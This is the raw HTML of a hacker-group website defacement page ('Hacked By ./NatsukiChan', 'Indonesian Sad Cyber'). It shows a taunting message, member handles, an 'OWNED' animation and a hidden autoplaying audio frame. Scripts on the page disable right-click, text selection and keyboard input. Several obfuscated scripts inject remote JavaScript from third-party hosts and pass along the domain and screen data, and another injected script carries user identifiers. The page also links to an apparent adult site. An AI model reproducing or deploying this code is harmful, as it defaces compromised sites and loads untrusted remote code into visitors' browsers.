
<html>
<head>
<title>Hacked By ./NatsukiChan</title>
<meta property="og:title" content="Hacked By ./NatsukiChan"/>
<link rel="icon" type="image/png" href="https://d30y9cdsu7xlg0.cloudfront.net/png/4627-200.png"/>
<meta name="keywords" content="this site for you"/>
<meta name="description" content=":v">
<meta name="author" content=""><meta name="googlebot" content="all,index,follow">
<meta name="robots" content="index, follow">
<meta contact=''/><script>alert("./NatsukiChan Inside !")</script>
  
	   

</script>
	   
	   <body oncontextmenu="return false" onselectstart="return false" ondragstart="return false"><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKvx42UitR9CCmBo6wWe5W4kfsOmQQyfYhCH6dndlUyfGxhDIR5ic8v%2by74a61SHzGfY%2bDGRCDYFXs7U3XrreSt3Ou28ylUQtxUua8qTFQK7ecJ0lbmuPI8s8ljmxsnoT88tGdjdAfiqHSfTr71QiBSRJlGCDc7uUbNS0kkFjpp3tBlst2IuFZPDHPW8K6H2s%2f%2fyJzWNnCSwpxflcMVhYKLZ%2btL7YbrEVFM3z2qyC6HhsRWEf1wDbrTYbZzrohb6USz4H2nOcshPvpQ3ygTt6Gy5Irjc9s8Fk4MxocWc3QelX%2byNZWukQIRObb3t8%2b2BfVu8z5BG8iKvz1Vuch7hUa5MRZV5blaHKUzJPyAB57%2bQXB5WWHpsE9P2M%2f6N8%2fZOhuPmy32WlLv0Dx%2bhGC30KM2P1uvLljF%2btK7uTcuqey%2fuMIRajCZ1RNSLexAEmYmDJ6NHsAV%2fMwKWbSOlB4MhD2H%2fMmLhelAQ3rcj4%2bYlY090h2tIaf1G7rcC33ZBH58H62Ep3TCQDMpdMDt4cSLz1yvN%2fiHhC4w6nLInMQPhS5IXKBQmkUOKDEAsODR2WYx3oB" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs1.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssK3uaf2a2QbrGygqSw4rvXm6bv9MNdpq4Uu69RzmN5xN%2fAVP2%2bQ48PWyBNxkI5CLCi83FqMLhzTLlGvoeuXmEfEXxG4Is8GPmgx%2bu9JE3mkoNlh0ygwhL73i7GY1iIP45hPSimrz2XzMiBvFweLQmz4%2bLrAAbL12Pqsbv5ttOKXHbcfJoW9S8gNI%2bs5FEBPS84zgmxnZEI8T8XkudT97lPVw5%2brasAj3nL1V%2byLnzYkx9iLHSUtSQtT16a4tLoMEPGNU4UrS8Cj9C1%2bq3uOKMCC0pHXY4IAu5EtVln5HzTG1GeupQIiYZRXDA1hP92i67zjvKyLQWsdnhrXbMF4Ho3%2ftc2u2DIbcmDPZmgn5QjjOBl1pzr0qUU8onNFETev5hfqP%2bdt33ser47B8548tP60QSNHUs3ReXaULYPmYKNZObOZmqxR2YtAf9Am6PzVgV%2fyGn8%2bn6EBhsFmnrDuXKrHQ%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + 4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2R2sIDcYPaF8%2faYbAxhcZY5O6xKtb0XsPo7a9WGZ7lWQTpowEonXpmI%2bIYr7MhNxub0lbEGfRSVF%2fZ67%2fDSnzTrPcEKrt6io%2fv1RAmFAyTqyevFovOflJsHtJsBa4eE6QGsf0GgfDxMo5jPbzE0MytbLeXSd1Achiqe%2fmoxDA0BHng9jR4ljJK%2bkBAclsuGJJI37or98JVB7%2b8OGaCG7s2ofoYMGw5MmR2x55z4xv8tDbamIqu%2fgl1EUNnWZ2OaOe6QEMZC7uV16a%2fDNQkYsVjCVsKGMtt9DeG5v6q01Bf2LsrHbGjPmm%2bLoRSbq2nBv8zDqHI9jW5dP%2fzRsW4pK3QeyY3aYVHYbjdjBGZgfG5T2L4tKikhdXh10DXJkrFHFVerjZIxzOGW3JXXY%2bKX6fATgvWi59d3EGGOMZJrh%2bENDuz%2fG1oqu4x8JmhL80wpJMmJqT4lrBZDw6faWJGUN%2fSKvUECdBr0SJqDLMthbb220tYbVnfglzjfIC9ErMHaV8n2rI1pUzd08%3d + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
<script type="text/javascript">

//form tags to omit in NS6+:
var omitformtags=["input", "textarea", "select"]

omitformtags=omitformtags.join("|")

function disableselect(e){
if (omitformtags.indexOf(e.target.tagName.toLowerCase())==-1)
return false
}

function reEnable(){
return true
}

if (typeof document.onselectstart!="undefined")
document.onselectstart=new Function ("return false")
else{
document.onmousedown=disableselect
document.onmouseup=reEnable
}

</script>
<body onkeydown="return false">

<script language=JavaScript>
<!--

//Disable right mouse click Script
//By NatsukiChan (Natsukie4@gmail.com)


var message="Hacked By ./NatsukiChan";

///////////////////////////////////
function clickIE4(){
if (event.button==2){
alert(message);
return false;
}
}

function clickNS4(e){
if (document.layers||document.getElementById&&!document.all){
if (e.which==2||e.which==3){
alert(message);
return false;
}
}
}

if (document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS4;
}
else if (document.all&&!document.getElementById){
document.onmousedown=clickIE4;
}

document.oncontextmenu=new Function("alert(message);return false")

// -->
</script>
</head>
<script data-type="injected" src="//technologiemounac.com/addon/script/content_site?integration=anywhere&v=n11.12.1.190&os_mj=6&os_mn=1&os_bitness=32&mid=21659ccf0e9d8a4732812664aaa034b7&uid=D26CFF32B4EDFEF8F6E137C0886C258D&aid=4772&aid2=none&ts=1481879889&ts2=&psd=true">
</script>
</head>
<style>

         body {
         background	: #black;
         background-image: url();
         background-repeat:no-repeat;
         background-attachment: fixed;
         background-size: 1350px;
         font-family	: Courier new;
         text-align	: center;
         color		: #fff;
         }
         pre {
         margin-top: 9%;
         }



.error {
  text-align: center;
  font-family: 'Gilda Display', serif;
  -webkit-animation: noise-3 1s linear infinite;
          animation: noise-3 1s linear infinite;
  overflow: default;
}


.info {
  text-align: center;
  width: 200px;
  height: 60px;
  margin: auto;
  position: absolute;
  top: 280px;
  bottom: 0;
  left: 20px;
  right: 0;
  -webkit-animation: noise-3 1s linear infinite;
          animation: noise-3 1s linear infinite;
}


.info:after {
  content: 'OWNED';
  font-family: OCR-A;
  font-size: 100px;
  text-align: center;
  width: 800px;
  margin: auto;
  position: absolute;
  top: 20px;
  bottom: 0;
  left: 40px;
  right: 0;
  opacity: 0;
  color: white;
  -webkit-animation: noise-1 .2s linear infinite;
          animation: noise-1 .2s linear infinite;
}

@-webkit-keyframes noise-1 {
  0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  10% {opacity: .1;}
  50% {opacity: .5; left: -6px;}
  80% {opacity: .3;}
  100% {opacity: .6; left: 2px;}
}

@keyframes noise-1 {
  0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  10% {opacity: .1;}
  50% {opacity: .5; left: -6px;}
  80% {opacity: .3;}
  100% {opacity: .6; left: 2px;}
}

@-webkit-keyframes noise-2 {
  0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  10% {opacity: .1;}
  50% {opacity: .5; left: 6px;}
  80% {opacity: .3;}
  100% {opacity: .6; left: -2px;}
}

@keyframes noise-2 {
  0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  10% {opacity: .1;}
  50% {opacity: .5; left: 6px;}
  80% {opacity: .3;}
  100% {opacity: .6; left: -2px;}
}

@-webkit-keyframes noise {
  0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}  
  4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);}
  43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);}
}

@keyframes noise {
  0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}  
  4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);}
  43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);}
}

@-webkit-keyframes noise-3 {
  0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);}
  43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate(60deg);}
}

@keyframes noise-3 {
  0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);}
  43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate(60deg);}
}

.wrap {
  top: 30%;
  left: 25%;
  
  height: 200px;
  
  margin-top: -100px;
  position: absolute;
}
code {
  color: white;
}
span.blue {
  color: #48beef;
}
span.comment {
  color: #7f8c8d;
}
span.orange {
  color: #f39c12;
}
span.green {
  color: #33cc33;
}

.viewFull {
  font-family:OCR-A;
  color:orange;
  text-decoration:;
}

	
}

 @media only screen and (min-height: 500px) {

.viewFull{
  display:none; 	
	}

}
	</style>


<body bgcolor='black'>


<link href='https://fonts.googleapis.com/css?family=Orbitron' rel='stylesheet' type='text/css'>


<iframe src="https://f.top4top.net/m_1090znvdo1.mp3" frameborder="0" height="0" width="0"></iframe>  

<div class="error">

<center>
<br>
<br>
<img src="http://cdn.lowgif.com/full/1f7630e9b2d033c0-different-anime-i-need-another-season-of-aoharu-x-kikanjuu.gif" width="500"/>
</br>
<br>
<br>

 <font size="13" face='Orbitron' class="pont" color="white"> </font>

<p>
<font size="7" face='Orbitron' class="pont" color="red">Indonesian Sad Cyber<font color="WHITE" class="pont2"></font><br></font>
<br></center><font size="4" face='times new roman' class="pont" color="gold">  <font size="5" face='CHILLER' class="pont" color="red"> <font size="4" face='times new roman' class="pont" color="gold"> <a  href="https://www.facebook.com/slmnid" target_blank><font size="5" face='chiller' class="pont" color="red"></a>


<font color="white">Msg : " I Just Wanna Be With You :')
<br><br><font color="red" face='papyrus'>[!]  We Are [!] </font>
<br><font color="white" face='papyrus'>./Lasthope ~ Gend3ruw0 ~ Yukiteru404 ~ Mr.Swan ~ Mr.Cakil</font>
<br><a  href="http://xvideos.com.gu-ru.net/video2337111/kantoh_enko_20161125_1" target_blank><font color="red" face='Orbitron' size='5'> \!/   Indonesian Hacker Rulez  \!/</font>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs1.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKUXBMgf6AC9AOQ1F49q7nbS3LSC9GO8yWuzitYDyDhx2HnPRzdyKNdB8LRL5Rk3TxtNG8RZrtRM8UJjE3nj86byLxyQUvBJHKioiVi%2bh%2fztD5hpf4%2bfIRPd4dehh861thvHcoAuOFWsftYnoDWBKGk6YaPc%2bMR1%2bUgQiUgbS7d%2f2bo%2f5o1fwBjjeLuLTo1t6aB98q%2fCy8wctHf8Aaj8M0YnikIYROOYbsEkOTolbW%2f4TLOR1PRkcEAYp976u0johQdJXKiFlnxxFcmgj%2bfxDDOu1cJ8tkpvbAN67nW%2bADmoyoGstCoTEVvs84xZQ4o3VebpNC%2bxCSRbSSvjyjUhn2av%2fk6owGUR794RWx37dsWRBQ3fgG5Ba%2bDEYO851o9h4bWKxytvWsbyQAspfDmC1YZA72NFkbgZHqcf0yBAa4Iwa2ksTLW1JDXODr5ncjoE0wXicjcavQLkQkzWpezDzUmWTfMhkmggOiZxaScTh1T56n1SvfmJqxH9mj48ssfSQHAjWCQuIdJ66BE%2bhmbjf1UOHanfch5eqKIvamcV2jrVdkUVb1XLjE4%2fBPyFd1N%2bNB" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};
</script>
</body>
</html>
